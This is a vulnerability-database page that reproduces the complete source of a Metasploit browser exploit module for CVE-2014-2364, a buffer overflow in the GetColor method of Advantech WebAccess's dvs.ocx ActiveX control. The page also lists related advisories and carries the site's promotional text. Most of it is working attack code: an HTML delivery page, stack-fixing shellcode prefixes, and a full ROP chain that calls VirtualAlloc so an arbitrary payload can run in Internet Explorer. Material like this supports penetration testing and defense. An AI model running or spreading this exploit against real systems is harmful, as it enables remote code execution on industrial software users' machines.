Vulners
Lucene search
Advantech WebAccess dvs.ocx GetColor Buffer Overflow
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Advantech WebAccess dvs.ocx GetColor Buffer Overflow Exploit | 24 Sep 201400:00 | – | zdt |
 | Advantech WebAccess < 7.2-2014.06.06 Multiple Vulnerabilities | 14 Feb 201700:00 | – | nessus |
| Advantech WebAccess < 7.2-2014.06.06 Multiple Vulnerabilities | 14 Apr 201400:00 | – | nessus |
 | CVE-2014-2364 | 24 Sep 201400:00 | – | circl |
 | CVE-2014-2364 | 19 Jul 201401:00 | – | cve |
 | CVE-2014-2364 Advantech WebAccess Stack-Based Buffer Overflow | 19 Jul 201401:00 | – | cvelist |
 | Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit) | 24 Sep 201400:00 | – | exploitdb |
 | Advantech WebAccess Vulnerabilities | 19 Apr 201406:00 | – | ics |
 | Advantech WebAccess dvs.ocx GetColor Buffer Overflow | 12 Sep 201413:57 | – | metasploit |
 | CVE-2014-2364 | 19 Jul 201405:09 | – | nvd |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
sprintf can be reached with user controlled data through the GetColor function.
This module has been tested successfully on Windows XP SP3 with IE6 and Windows
7 SP1 with IE8 and IE 9.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2364'],
['ZDI', '14-255'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
],
'DefaultOptions' =>
{
'Retries' => false,
'InitialAutoRunScript' => 'migrate -f'
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => /MSIE/i,
:ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
:clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
:method => "GetColor"
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x5c",
# Patch the stack to execute the decoder...
'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
# Fix the stack again, this time better :), before the payload
# is executed.
'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 17 2014'))
end
def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")
content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
EOS
print_status("Sending #{self.name}")
send_response_html(cli, content, {'Pragma' => 'no-cache'})
end
# Uses gadgets from ijl11.dll 1.1.2.16
def rop_payload(code)
xpl = rand_text_alphanumeric(61) # offset
xpl << [0x60014185].pack("V") # RET
xpl << rand_text_alphanumeric(8)
# EBX = dwSize (0x40)
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << [0x9ffdafc9].pack("V") # eax value
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
xpl << [0x60018084].pack("V") # POP EBP # RETN
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
# EDX = flAllocationType (0x1000)
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << [0x9ffdbf89].pack("V") # eax value
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
# ECX = flProtect (0x40)
xpl << [0x6002157e].pack("V") # POP EAX # RETN
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << rand_text_alphanumeric(4) # padding
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
xpl << [0x60012288].pack("V") # POP ECX # RETN
xpl << [0xffffffff].pack("V") # ecx value
0x41.times do
xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
end
# EAX = ptr to &VirtualAlloc()
xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
# EBP = POP (skip 4 bytes)
xpl << [0x6002054b].pack("V") # POP EBP # RETN
xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
# ESI = ptr to JMP [EAX]
xpl << [0x600181cc].pack("V") # POP ESI # RETN
xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
# EDI = ROP NOP (RETN)
xpl << [0x60021ad1].pack("V") # POP EDI # RETN
xpl << [0x60021ad2].pack("V") # ptr to &(retn)
# ESP = lpAddress (automatic)
# PUSHAD # RETN
xpl << [0x60018399].pack("V") # PUSHAD # RETN
xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
xpl << code
xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
xpl
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Sep 2014 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.40188